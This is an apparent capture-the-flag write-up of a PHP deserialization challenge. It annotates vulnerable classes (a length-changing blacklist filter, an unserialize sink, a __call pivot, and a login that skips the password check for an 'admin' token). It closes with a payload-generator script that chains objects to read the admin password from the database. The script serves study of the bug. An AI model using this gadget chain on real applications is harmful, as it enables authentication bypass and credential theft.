// lib.php -> User class
// NOTE(review): unserialize() on a string that getNewInfo() builds from $_POST is the
// deserialization sink of this chain. The only thing between the attacker and the
// serialized text is safe(), which rewrites the already-serialized string rather than
// validating the values. (Spelled getNewinfo here; PHP method names are case-insensitive.)
public function update(){
    $Info=unserialize($this->getNewinfo());
    $age=$Info->age;
    $nickname=$Info->nickname;
    // NOTE(review): the SQL is assembled by interpolating deserialized, user-controlled
    // values (SQL injection if it were ever executed). UpdateHelper::__construct declares
    // only ($newInfo, $sql), so $_SESSION['id'] lands in $newInfo, $Info lands in $sql and
    // this query string is an ignored extra argument.
    $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);
    // This feature is unfinished; placeholder for now.
}
我们发现 update() 对 getNewinfo() 的返回值直接调用了 unserialize()，这是一个反序列化入口，而被反序列化的数据源头来自用户请求。继续看看 getNewInfo():
/**
 * Serialize a fresh Info built from the POSTed age/nickname and run the
 * result through safe().
 *
 * Both constructor arguments come straight from $_POST, so the attacker
 * fully controls the property values that end up inside the serialized
 * string. NOTE(review): safe() is applied to the serialized text, not to the
 * inputs, so any replacement it makes changes byte lengths inside the
 * s:N:"..." fields of that text.
 *
 * Called from User::update() as getNewinfo(); PHP method names are
 * case-insensitive, so both spellings resolve here.
 *
 * @return string serialized Info after safe()
 */
public function getNewInfo(){
    $info = new Info($_POST['age'], $_POST['nickname']);
    return safe(serialize($info));
}
它用 $_POST 里的 age 和 nickname 实例化一个 Info 对象并序列化，两个参数都由用户控制。序列化得到的字符串随后交给 safe() 过滤——注意 safe() 作用在已经序列化的文本上，而不是原始输入上，因此它把 `'`、`\` 等字符替换成 6 个字符的 `hacker` 会改变字符串长度，但序列化格式里 `s:N:` 的长度前缀不会随之更新：
/**
 * Blacklist filter applied to the serialized Info string.
 *
 * Every occurrence of a listed keyword, and of the quote, backslash and
 * star characters, is replaced by the literal "hacker". Replacements are
 * applied in list order by a single str_replace() call.
 *
 * NOTE(review): the replacement is 6 bytes while several needles are 1 byte
 * (', \, *), so the output length differs from the input length. Because
 * getNewInfo() runs this over serialize() output, the s:N:"..." length
 * prefixes in that output no longer match their contents once anything is
 * replaced - the property a deserialization payload can exploit.
 *
 * @param string $parm serialized data to filter
 * @return string filtered string
 */
function safe($parm){
    $blacklist = [
        'union', 'regexp', 'load', 'into', 'flag', 'file', 'insert',
        "'", '\\', '*', 'alter',
    ];
    $replacement = 'hacker';
    return str_replace($blacklist, $replacement, $parm);
}
/**
 * Value object serialized by User::getNewInfo().
 *
 * Property declaration order (age, nickname, CtrlCase) is the order in which
 * serialize() writes them, so it is kept exactly. The constructor never
 * assigns CtrlCase; it stays null unless set from outside (the payload
 * generator assigns a dbCtrl to it).
 */
class Info
{
    public $age;
    public $nickname;
    public $CtrlCase;

    /**
     * @param mixed $age      stored as-is
     * @param mixed $nickname stored as-is
     */
    public function __construct($age, $nickname)
    {
        $this->age = $age;
        $this->nickname = $nickname;
    }

    /**
     * Catch-all for calls to undefined methods: the method name is ignored
     * and the first argument is forwarded to $this->CtrlCase->login(), whose
     * return value is echoed.
     *
     * NOTE(review): with CtrlCase pointing at a dbCtrl, any unknown method
     * call on an Info runs dbCtrl::login($argument[0]) - the pivot of the
     * gadget chain. With CtrlCase null this is a call on null.
     */
    public function __call($name, $argument)
    {
        $sql = $argument[0];
        $handler = $this->CtrlCase;
        echo $handler->login($sql);
    }
}
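/**
 * Thin mysqli wrapper used by the login flow.
 *
 * NOTE(review): connection credentials are hard-coded (root/root against a
 * local "test" database) and the constructor reads the raw request and
 * session on instantiation. The listing this was copied from lacked the
 * class's closing brace; it is restored here and nothing else in the logic
 * is changed.
 */
class dbCtrl
{
    public $hostname = "127.0.0.1";
    public $dbuser = "root";
    public $dbpass = "root";
    public $database = "test";
    public $name;
    public $password;
    public $mysqli;
    public $token;

    /**
     * Take the submitted credentials from $_POST and the current token from
     * $_SESSION. No validation is performed.
     */
    public function __construct()
    {
        $this->name = $_POST['username'];
        $this->password = $_POST['password'];
        $this->token = $_SESSION['token'];
    }

    /**
     * Run $sql as a prepared statement with $this->name bound to its single
     * '?' placeholder, then read the first row as two columns.
     *
     * The caller supplies the SQL text itself, so "prepared" only protects
     * the one bound value - whoever controls $sql controls the query. Result
     * columns are bound positionally: column 1 becomes $idResult and is what
     * gets returned, column 2 is compared against the password hash. A query
     * that selects the columns in another order therefore swaps what comes
     * back.
     *
     * Checks, in order:
     *  1. $this->token == 'admin'  -> return column 1 with no password check.
     *     NOTE(review): loose comparison; a boolean true token also passes.
     *  2. column 1 falsy           -> print "用户不存在!" and return false.
     *  3. md5($this->password) !== column 2 -> print "密码错误!" and return
     *     false. NOTE(review): unsalted md5 is the stored hash format.
     *  4. otherwise store $this->name as the session token and return
     *     column 1.
     *
     * NOTE(review): prepare() returning false (malformed SQL) is not checked,
     * so bind_param() would then be invoked on false.
     *
     * @param string $sql query with exactly one '?' placeholder
     * @return mixed first result column, or false
     */
    public function login($sql)
    {
        $this->mysqli = new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);
        if ($this->mysqli->connect_error) {
            die("连接失败,错误:" . $this->mysqli->connect_error);
        }
        $result = $this->mysqli->prepare($sql);
        $result->bind_param('s', $this->name);
        $result->execute();
        $result->bind_result($idResult, $passwordResult);
        $result->fetch();
        $result->close();
        if ($this->token == 'admin') {
            return $idResult;
        }
        if (!$idResult) {
            echo('用户不存在!');
            return false;
        }
        if (md5($this->password) !== $passwordResult) {
            echo('密码错误!');
            return false;
        }
        $_SESSION['token'] = $this->name;
        return $idResult;
    }
}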
/**
 * Helper that User::update() instantiates to apply a profile change.
 *
 * Unfinished: the constructor never stores either argument on the object,
 * so $id, $newinfo and $sql are only ever populated from outside (or by
 * unserialize()). Both locals the constructor creates are dead.
 *
 * NOTE(review): unserialize($newInfo) in the constructor is a second
 * deserialization sink - User::update() passes $_SESSION['id'] as that
 * argument - and `new dbCtrl()` reads $_POST/$_SESSION as a side effect.
 * __destruct() echoes $this->sql; echoing an object invokes its
 * __toString(), which is how a crafted $sql object gets control at
 * destruction time (presumably the real User class, not fully shown in this
 * excerpt, defines __toString() - confirm against lib.php).
 */
class UpdateHelper
{
    public $id;
    public $newinfo;
    public $sql;

    public function __construct($newInfo, $sql)
    {
        $decoded = unserialize($newInfo);
        $controller = new dbCtrl();
    }

    public function __destruct()
    {
        echo $this->sql;
    }
}
<?php
/*
 * Payload generator for the deserialization chain.
 *
 * The stub classes mirror the challenge's classes - same names, same public
 * properties in the same declaration order, because serialize() emits
 * properties in that order - but carry no methods, so building the object
 * graph here has no side effects.
 *
 * Object graph, outermost first:
 *   UpdateHelper->sql = User                    (echoed by UpdateHelper::__destruct)
 *   User->age         = the SQL to run
 *   User->nickname    = Info with CtrlCase = dbCtrl (Info::__call forwards arg 0 to dbCtrl::login)
 *   dbCtrl->token     = 'admin'                 (login() returns column 1 without a password check)
 *
 * The SQL selects (password, id): login() binds column 1 to $idResult and
 * returns it when token == 'admin', so the value that comes back is the
 * password column. dbCtrl->name is 'admin', the value bound to '?'.
 *
 * NOTE(review): the step from `echo $this->sql` to a method call on
 * User->nickname is not visible in this excerpt; presumably the real User
 * class defines __toString() that calls something on $this->nickname with
 * $this->age - confirm against lib.php. The serialize()/output step is not
 * shown here either.
 */
class User
{
    public $id;
    public $age = null;
    public $nickname = null;
}

class Info
{
    public $age;
    public $nickname;
    public $CtrlCase;

    public function __construct($age, $nickname)
    {
        $this->age = $age;
        $this->nickname = $nickname;
    }
}

class UpdateHelper
{
    public $id;
    public $newinfo;
    public $sql;
}

class dbCtrl
{
    public $hostname = "127.0.0.1";
    public $dbuser = "noob123";
    public $dbpass = "noob123";
    public $database = "noob123";
    public $name = 'admin';
    public $password;
    public $mysqli;
    public $token;
}

// Innermost first: the database controller carrying the admin token ...
$d = new dbCtrl();
$d->token = 'admin';

// ... wrapped in an Info whose __call hands the SQL to login() ...
$b = new Info('', '1');
$b->CtrlCase = $d;

// ... wrapped in a User that carries the SQL in ->age ...
$a = new User();
$a->nickname = $b;
$a->age = "select password,id from user where username=?";

// ... and finally the UpdateHelper whose __destruct echoes ->sql.
$c = new UpdateHelper();
$c->sql = $a;